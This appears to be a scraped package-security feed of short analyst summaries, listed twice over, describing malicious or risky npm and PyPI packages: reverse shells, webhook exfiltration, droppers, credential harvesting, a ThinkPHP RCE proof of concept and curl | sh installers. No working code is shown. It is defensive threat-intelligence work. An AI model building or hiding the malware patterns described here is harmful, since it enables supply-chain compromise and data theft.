Secure your dependencies. Ship with confidence.

The script exhibits high-risk, persistence-enabled behavior by injecting external components into Python site-packages, installing a boot-time service, and providing a world-writable executable. The lack of integrity checks, reliance on /root as a source, and permissive permissions create strong supply-chain and host-compromise risk. Treat as dangerous and require thorough validation, non-production sandbox testing, or removal from automated pipelines.

The code demonstrates high-risk behavior typical of dropper/packer-like workflows: encrypted payloads embedded in stubs, base64-wrapped code executed at runtime, and optional packaging into executables. While there are syntax anomalies and incomplete branches that prevent immediate execution, the overall pattern is aligned with covert payload delivery or supply-chain risk. Thorough review of the complete, verified source is required before use; treat as dangerous and isolate until confirmed safe.

This module contains heavy obfuscation and dynamic decoding that reads browser state (document/window/opener) and uses CryptoJS to derive/produce a cryptographic value returned by getckey. The obfuscation, dynamic property access, and use of page/browser data are strong indicators of malicious or at least intentionally concealed behavior (likely token/key derivation or decryption for further malicious use). I recommend treating this package as suspicious and not using it until its clear, unobfuscated purpose and callers are inspected. If found in a dependency, remove or isolate it and perform a broader supply-chain investigation.

Legitimate Python development tool with critical command injection vulnerability. The os.system() usage with unescaped user input poses significant security risk, allowing potential arbitrary command execution.

Live on pypi for 21 minutes before removal. Socket users were protected even while the package was live.

The source code exhibits behavior consistent with data exfiltration malware. It collects sensitive system information and sends it to external endpoints without user consent, posing a significant security risk.

Live on npm for 30 days, 12 hours and 58 minutes before removal. Socket users were protected even while the package was live.

This module implements deliberate data exfiltration: it enumerates and reads files from a hardcoded local directory and transmits their contents and filenames to a hardcoded remote webhook by invoking curl via child_process.execSync. The exported API returns a benign-looking object, likely to mask the malicious side-effect. This is malicious behavior in a supply-chain context. Remove the package, treat any systems that ran it as compromised, and investigate what data may have been exposed. Replace with audited, safe code and rotate any secrets that could have been stored under the targeted directory.

The module is a serializer/deserializer (AOT jelling/unjelling) with functionality that can execute arbitrary code when given crafted input. The code itself is not obviously malicious, but it provides standard deserialization features that will execute code during object reconstruction (compile/eval, reflect.namedObject, __setstate__, copyreg loaders). Treat any AOT/source input as fully untrusted; do not call unjellyFromSource or unjellyFromAOT on attacker-controlled data. Use only on trusted inputs or with additional sandboxing.

Live on pypi for 1 hour and 31 minutes before removal. Socket users were protected even while the package was live.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

This fragment appears to be part of a legitimate DOS/pDOS post-processing tool for Quantum ESPRESSO, but it uses multiple high-risk patterns: executing external Python files (exec(open(...).read())), copying and injecting variable content into a script and then executing it, and using bare excepts that suppress errors. These behaviors make the module vulnerable to supply-chain or local-file-tampering attacks: if an attacker can modify files in main_dir or dir_files (or influence the variables used to build filenames), they can achieve arbitrary code execution with the same privileges as the user running this script. I did not find explicit malicious payloads (no networking/exfiltration, no reverse shell code, no hardcoded secrets), so the code itself looks more insecure than intentionally malicious. Recommendation: avoid exec on arbitrary files; validate and/or cryptographically verify any scripts before executing; minimize use of globals and prefer importing modules safely; sanitize inputs and fail loudly rather than swallowing exceptions. Also review the rest of the project for places that set the variables used to build filenames. Note: the fragment contains multiple syntax errors and appears truncated which reduces certainty of the analysis.

This file implements a straightforward and functional reverse shell: it connects to a hardcoded remote IP:port, spawns /bin/sh, and pipes input/output between the shell and the network socket. This gives a remote actor arbitrary command execution and data exfiltration capabilities. The code is malicious in context and poses an immediate, high-risk threat. Remove/quarantine the file and treat systems that ran it as compromised.

This install script runs package code automatically at install time and the package itself declares it is C2 malware. Treat this as malicious: do not install in any environment you care about. Inspecting lib/init.js is required to determine exact capabilities, but the risk includes remote control, telemetry/exfiltration, persistence, and arbitrary code execution.

This module is not overtly malicious (no encoded payloads, no external exfiltration, no reverse shell), but it contains high-risk insecure patterns: user-controlled values are directly interpolated into shell command strings and passed to node_utils.run_command, creating a strong command-injection risk if run_command executes via a shell. The endpoints also expose detailed system information which may be sensitive. Recommend: validate/whitelist inputs, avoid shell=True or use argument lists for subprocess, escape or validate command arguments, add authentication/authorization, reduce logging of sensitive data, and review node_utils.run_command implementation. Until those mitigations are in place, treat the package as risky for production use.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

This snippet is malicious or extremely unsafe: it decodes and executes a hard-coded curl command to a suspicious domain via a shell. Treat as high-risk malware: do not run, remove or isolate the package, and investigate execution contexts where it may have run. Replace with safe, explicit network code with strict validation or remove entirely.

This module is malicious or at minimum highly malicious-looking: it performs extensive sensitive data collection (environment variables, private keys, .env files, n8n database + decryption of credentials, cloud metadata endpoints to harvest credentials, SSH keys, docker config, npmrc, bash history, etc.), runs many shell commands for reconnaissance, and returns all data via the node output. Although it does not itself transmit data to outside internet domains, the node output can be easily forwarded by an attacker-controlled workflow, so inclusion of this module in a repository or runtime poses a severe supply-chain/data-exfiltration risk. It should not be used and systems where it is present should be considered compromised and investigated immediately.

The analyzed skill is coherent with an end-to-end Claude Code automation framework, including isolation, logging, and PR lifecycle management. Security concerns center on permission-bypass capabilities, autonomous long-running execution, and access to logs/registries that may reveal prompts or intents. Governance controls, least-privilege prompts, strict access controls for logs/registries, and per-action approvals are recommended to mitigate risk. Overall, the design is powerful but requires careful sandboxing and operational governance.

`lotusbail` is a malicious npm package that masquerades as a WhatsApp Web API library by forking legitimate Baileys-based code and preserving working messaging functionality. In addition to normal API behavior, it inserts a wrapper around the WhatsApp WebSocket client so that all traffic passing through the library is duplicated for collection. Reported data theft includes WhatsApp authentication tokens and session keys, full message content (sent/received and historical), contact lists (including phone numbers), and transferred media/files. The package also attempts to establish persistent unauthorized access by hijacking the WhatsApp device-linking (“pairing”) workflow using a hardcoded pairing code, effectively linking an attacker-controlled device to the victim’s account; removing the npm dependency does not automatically remove the linked device. To hinder detection, the exfiltration endpoint is hidden behind multiple obfuscation layers, collected data is encrypted (including a custom RSA implementation), and the code includes anti-debugging traps designed to disrupt analysis.

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] The package/documentation is functionally benign and intended to help users create visualizations, but it contains multiple high-risk operational patterns: a pipe-to-shell installer (curl | sh), repeated examples that transmit arbitrary code/data to third-party remote executors, and broad allowed-tool permissions. These patterns create realistic opportunities for credential or data leakage and increase supply-chain risk if distribution endpoints are compromised. Recommendations: do not use curl | sh without manual verification of the installer and checksum; avoid sending secrets or production data to remote executors; prefer local execution for sensitive data; and the project should add explicit warnings and demonstrate checksum verification and least-privilege installation paths. LLM verification: The skill is functionally benign and aligns with its data-visualization purpose. No direct indicators of malware or obfuscation were found in the provided content. The primary security concern is supply-chain and operational: the pipe-to-shell install pattern, lack of explicit guidance about handling secrets and credential storage, and encouraging remote execution of arbitrary user code. Recommend removing or de-emphasizing the curl | sh quick-start, replacing it with an explicit download + chec

The code embeds a dangerous dynamic execution pattern by re-reading and executing the caller file contents in a separate Python process and then invoking the function by name. This can re-run initialization code, access sensitive data, and enable covert execution in a background context. It represents a notable supply-chain risk if the caller file is modifiable by an attacker. Recommend removing exec-based loading, using a clearly defined worker model (multiprocessing or threading with explicit callable targets), and implementing strict input validation and error handling to mitigate exposure.

This source file is part of the Sliver post-exploitation implant agent and implements remote-controlled offensive capabilities: arbitrary command execution, code injection into other processes, dynamic/native extension loading, privilege escalation (token manipulation), registry and service manipulation, and process memory dumping. These are explicit backdoor/malware behaviors. If present in a dependency for legitimate software, it represents a critical supply-chain compromise. It should not be used in production outside of controlled red-team engagements and must be treated as malicious in a general-purpose dependency context.

The code dynamically loads and executes scripts from an untrusted domain (e.g., 'distributerry[.]com') without validation, leading to potential remote code execution. It uses 'eval' to parse JSON, which can execute arbitrary code. The code also sends data to external domains, raising concerns about data exfiltration.

The code is designed to exfiltrate sensitive system and network information to an external server. The conditions in `isValid` and use of specific encoding functions suggest a deliberate attempt to hide the true nature and selectively activate this behavior, indicative of a malware-like payload.

Live on npm for 7 hours and 4 minutes before removal. Socket users were protected even while the package was live.

The codebase contains legitimate migration tooling but includes a high-risk backdoor-like construct (selfHidingFile) that can be invoked to disclose or serve local files under license control. When combined with broad filesystem and network interactions driven by external inputs, this creates a serious security risk and potential for misuse in a compromised supply chain. Recommend removing or isolating the selfHidingFile payload, tightening input validation, ensuring least privilege for filesystem operations, and performing a formal security review of all dynamic code generation and remote fetch pathways.

This file is a clear proof-of-concept exploit for ThinkPHP RCE. It constructs and sends HTTP requests with hardcoded payloads that attempt to execute phpinfo() on remote servers and checks for 'allow_url_fopen' to confirm success. It should not be run against systems without explicit authorization. The snippet contains a minor syntax error in the example usage and uses overly broad exception handling. While it does not include persistence or direct data exfiltration in this fragment, its network requests can trigger remote code execution, making it a high-risk offensive tool.

The script exhibits high-risk, persistence-enabled behavior by injecting external components into Python site-packages, installing a boot-time service, and providing a world-writable executable. The lack of integrity checks, reliance on /root as a source, and permissive permissions create strong supply-chain and host-compromise risk. Treat as dangerous and require thorough validation, non-production sandbox testing, or removal from automated pipelines.

The code demonstrates high-risk behavior typical of dropper/packer-like workflows: encrypted payloads embedded in stubs, base64-wrapped code executed at runtime, and optional packaging into executables. While there are syntax anomalies and incomplete branches that prevent immediate execution, the overall pattern is aligned with covert payload delivery or supply-chain risk. Thorough review of the complete, verified source is required before use; treat as dangerous and isolate until confirmed safe.

This module contains heavy obfuscation and dynamic decoding that reads browser state (document/window/opener) and uses CryptoJS to derive/produce a cryptographic value returned by getckey. The obfuscation, dynamic property access, and use of page/browser data are strong indicators of malicious or at least intentionally concealed behavior (likely token/key derivation or decryption for further malicious use). I recommend treating this package as suspicious and not using it until its clear, unobfuscated purpose and callers are inspected. If found in a dependency, remove or isolate it and perform a broader supply-chain investigation.

Legitimate Python development tool with critical command injection vulnerability. The os.system() usage with unescaped user input poses significant security risk, allowing potential arbitrary command execution.

Live on pypi for 21 minutes before removal. Socket users were protected even while the package was live.

The source code exhibits behavior consistent with data exfiltration malware. It collects sensitive system information and sends it to external endpoints without user consent, posing a significant security risk.

Live on npm for 30 days, 12 hours and 58 minutes before removal. Socket users were protected even while the package was live.

This module implements deliberate data exfiltration: it enumerates and reads files from a hardcoded local directory and transmits their contents and filenames to a hardcoded remote webhook by invoking curl via child_process.execSync. The exported API returns a benign-looking object, likely to mask the malicious side-effect. This is malicious behavior in a supply-chain context. Remove the package, treat any systems that ran it as compromised, and investigate what data may have been exposed. Replace with audited, safe code and rotate any secrets that could have been stored under the targeted directory.

The module is a serializer/deserializer (AOT jelling/unjelling) with functionality that can execute arbitrary code when given crafted input. The code itself is not obviously malicious, but it provides standard deserialization features that will execute code during object reconstruction (compile/eval, reflect.namedObject, __setstate__, copyreg loaders). Treat any AOT/source input as fully untrusted; do not call unjellyFromSource or unjellyFromAOT on attacker-controlled data. Use only on trusted inputs or with additional sandboxing.

Live on pypi for 1 hour and 31 minutes before removal. Socket users were protected even while the package was live.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

This fragment appears to be part of a legitimate DOS/pDOS post-processing tool for Quantum ESPRESSO, but it uses multiple high-risk patterns: executing external Python files (exec(open(...).read())), copying and injecting variable content into a script and then executing it, and using bare excepts that suppress errors. These behaviors make the module vulnerable to supply-chain or local-file-tampering attacks: if an attacker can modify files in main_dir or dir_files (or influence the variables used to build filenames), they can achieve arbitrary code execution with the same privileges as the user running this script. I did not find explicit malicious payloads (no networking/exfiltration, no reverse shell code, no hardcoded secrets), so the code itself looks more insecure than intentionally malicious. Recommendation: avoid exec on arbitrary files; validate and/or cryptographically verify any scripts before executing; minimize use of globals and prefer importing modules safely; sanitize inputs and fail loudly rather than swallowing exceptions. Also review the rest of the project for places that set the variables used to build filenames. Note: the fragment contains multiple syntax errors and appears truncated which reduces certainty of the analysis.

This file implements a straightforward and functional reverse shell: it connects to a hardcoded remote IP:port, spawns /bin/sh, and pipes input/output between the shell and the network socket. This gives a remote actor arbitrary command execution and data exfiltration capabilities. The code is malicious in context and poses an immediate, high-risk threat. Remove/quarantine the file and treat systems that ran it as compromised.

This install script runs package code automatically at install time and the package itself declares it is C2 malware. Treat this as malicious: do not install in any environment you care about. Inspecting lib/init.js is required to determine exact capabilities, but the risk includes remote control, telemetry/exfiltration, persistence, and arbitrary code execution.

This module is not overtly malicious (no encoded payloads, no external exfiltration, no reverse shell), but it contains high-risk insecure patterns: user-controlled values are directly interpolated into shell command strings and passed to node_utils.run_command, creating a strong command-injection risk if run_command executes via a shell. The endpoints also expose detailed system information which may be sensitive. Recommend: validate/whitelist inputs, avoid shell=True or use argument lists for subprocess, escape or validate command arguments, add authentication/authorization, reduce logging of sensitive data, and review node_utils.run_command implementation. Until those mitigations are in place, treat the package as risky for production use.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

This snippet is malicious or extremely unsafe: it decodes and executes a hard-coded curl command to a suspicious domain via a shell. Treat as high-risk malware: do not run, remove or isolate the package, and investigate execution contexts where it may have run. Replace with safe, explicit network code with strict validation or remove entirely.

This module is malicious or at minimum highly malicious-looking: it performs extensive sensitive data collection (environment variables, private keys, .env files, n8n database + decryption of credentials, cloud metadata endpoints to harvest credentials, SSH keys, docker config, npmrc, bash history, etc.), runs many shell commands for reconnaissance, and returns all data via the node output. Although it does not itself transmit data to outside internet domains, the node output can be easily forwarded by an attacker-controlled workflow, so inclusion of this module in a repository or runtime poses a severe supply-chain/data-exfiltration risk. It should not be used and systems where it is present should be considered compromised and investigated immediately.

The analyzed skill is coherent with an end-to-end Claude Code automation framework, including isolation, logging, and PR lifecycle management. Security concerns center on permission-bypass capabilities, autonomous long-running execution, and access to logs/registries that may reveal prompts or intents. Governance controls, least-privilege prompts, strict access controls for logs/registries, and per-action approvals are recommended to mitigate risk. Overall, the design is powerful but requires careful sandboxing and operational governance.

`lotusbail` is a malicious npm package that masquerades as a WhatsApp Web API library by forking legitimate Baileys-based code and preserving working messaging functionality. In addition to normal API behavior, it inserts a wrapper around the WhatsApp WebSocket client so that all traffic passing through the library is duplicated for collection. Reported data theft includes WhatsApp authentication tokens and session keys, full message content (sent/received and historical), contact lists (including phone numbers), and transferred media/files. The package also attempts to establish persistent unauthorized access by hijacking the WhatsApp device-linking (“pairing”) workflow using a hardcoded pairing code, effectively linking an attacker-controlled device to the victim’s account; removing the npm dependency does not automatically remove the linked device. To hinder detection, the exfiltration endpoint is hidden behind multiple obfuscation layers, collected data is encrypted (including a custom RSA implementation), and the code includes anti-debugging traps designed to disrupt analysis.

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] The package/documentation is functionally benign and intended to help users create visualizations, but it contains multiple high-risk operational patterns: a pipe-to-shell installer (curl | sh), repeated examples that transmit arbitrary code/data to third-party remote executors, and broad allowed-tool permissions. These patterns create realistic opportunities for credential or data leakage and increase supply-chain risk if distribution endpoints are compromised. Recommendations: do not use curl | sh without manual verification of the installer and checksum; avoid sending secrets or production data to remote executors; prefer local execution for sensitive data; and the project should add explicit warnings and demonstrate checksum verification and least-privilege installation paths. LLM verification: The skill is functionally benign and aligns with its data-visualization purpose. No direct indicators of malware or obfuscation were found in the provided content. The primary security concern is supply-chain and operational: the pipe-to-shell install pattern, lack of explicit guidance about handling secrets and credential storage, and encouraging remote execution of arbitrary user code. Recommend removing or de-emphasizing the curl | sh quick-start, replacing it with an explicit download + chec

The code embeds a dangerous dynamic execution pattern by re-reading and executing the caller file contents in a separate Python process and then invoking the function by name. This can re-run initialization code, access sensitive data, and enable covert execution in a background context. It represents a notable supply-chain risk if the caller file is modifiable by an attacker. Recommend removing exec-based loading, using a clearly defined worker model (multiprocessing or threading with explicit callable targets), and implementing strict input validation and error handling to mitigate exposure.

This source file is part of the Sliver post-exploitation implant agent and implements remote-controlled offensive capabilities: arbitrary command execution, code injection into other processes, dynamic/native extension loading, privilege escalation (token manipulation), registry and service manipulation, and process memory dumping. These are explicit backdoor/malware behaviors. If present in a dependency for legitimate software, it represents a critical supply-chain compromise. It should not be used in production outside of controlled red-team engagements and must be treated as malicious in a general-purpose dependency context.

The code dynamically loads and executes scripts from an untrusted domain (e.g., 'distributerry[.]com') without validation, leading to potential remote code execution. It uses 'eval' to parse JSON, which can execute arbitrary code. The code also sends data to external domains, raising concerns about data exfiltration.

The code is designed to exfiltrate sensitive system and network information to an external server. The conditions in `isValid` and use of specific encoding functions suggest a deliberate attempt to hide the true nature and selectively activate this behavior, indicative of a malware-like payload.

Live on npm for 7 hours and 4 minutes before removal. Socket users were protected even while the package was live.

The codebase contains legitimate migration tooling but includes a high-risk backdoor-like construct (selfHidingFile) that can be invoked to disclose or serve local files under license control. When combined with broad filesystem and network interactions driven by external inputs, this creates a serious security risk and potential for misuse in a compromised supply chain. Recommend removing or isolating the selfHidingFile payload, tightening input validation, ensuring least privilege for filesystem operations, and performing a formal security review of all dynamic code generation and remote fetch pathways.

This file is a clear proof-of-concept exploit for ThinkPHP RCE. It constructs and sends HTTP requests with hardcoded payloads that attempt to execute phpinfo() on remote servers and checks for 'allow_url_fopen' to confirm success. It should not be run against systems without explicit authorization. The snippet contains a minor syntax error in the example usage and uses overly broad exception handling. While it does not include persistence or direct data exfiltration in this fragment, its network requests can trigger remote code execution, making it a high-risk offensive tool.